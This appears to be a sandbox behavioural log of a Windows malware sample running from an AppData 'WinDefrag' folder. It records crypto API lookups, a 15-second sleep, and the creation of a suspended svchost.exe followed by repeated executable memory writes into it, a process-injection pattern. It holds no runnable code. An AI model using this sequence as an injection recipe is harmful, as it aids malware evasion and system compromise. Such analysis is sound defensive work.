| Mutex | Release | mutex_name = gcc-shmem-tdm2-pthr_root_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListCnt_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListCnt_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListMax_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListMax_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idList_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idList_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListNextId_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListNextId_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-fc_key |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-fc_key |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_lock_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_lock_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_cancelling_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_cancelling_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-cond_locked_shmem_rwlock |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-cond_locked_shmem_rwlock |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-rwl_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-rwl_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_sch_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_sch_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_max_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_max_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_dest_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_dest_shmem |
|
1 | |
| System | Sleep | duration = 15000 milliseconds (15.000 seconds) |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x764991dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7649c532 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x764b779b |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x76b00000 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77e20000 |
|
1 | |
| Module | Load | module_name = shlwapi.dll, base_address = 0x75c60000 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76490000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75cf0000 |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe, base_address = 0x400000 |
|
249 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe, size = 260 |
|
1 | |
| Module | Load | module_name = wtsapi32, base_address = 0x75950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wtsapi32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wtsapi32.dll, function = WTSQueryUserToken, address_out = 0x75951f81 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wtsapi32.dll, function = WTSFreeMemory, address_out = 0x75951b65 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wtsapi32.dll, function = WTSEnumerateSessionsA, address_out = 0x75954023 |
|
1 | |
| User | Lookup Privilege | privilege = SeTcbPrivilege, luid = 7 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\svchost.exe, os_pid = 0x9b4, creation_flags = CREATE_SUSPENDED, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_SHOWNOACTIVATE |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0xc0000018 |
|
1 | |
| Module | Load | module_name = kernelbase.dll, base_address = 0x0 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e168, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2679064 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x50000, size = 544 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e168, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2679064 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x7fffffdd000, size = 712 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0xffc20000, size = 64 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0xffc200e8, size = 264 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\system32\svchost.exe, address = 0xffc2246c, protection = PAGE_EXECUTE_READWRITE, size = 2679144 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xffc2246c, size = 22 |
|
1 | |
| Thread | Resume | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, os_tid = 0x67c |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e028, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2679064 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e0b0, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2678984 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140000000, size = 1024 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\system32\svchost.exe, address = 0x140000000, protection = PAGE_READONLY, size = 2678968 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140001000, size = 166400 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a000, size = 35328 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140033000, size = 3488 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140033000, size = 1024 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140034000, size = 8704 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140037000, size = 2048 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140038000, size = 1536 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e008, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678168 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 21 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28dc18, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2677704 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28dc78, free_type = MEM_RELEASE, size = 2677864 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20025, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28dda8, free_type = MEM_RELEASE, size = 2678176 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 21 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20025, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a2e8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a2f0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a2f8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a300, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 5 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20015, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a308, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a310, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 10 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001a, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a318, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 11 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001b, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a320, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a328, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a330, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a338, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 17 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20021, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a340, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 9 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20019, size = 8 |
|
1 | |
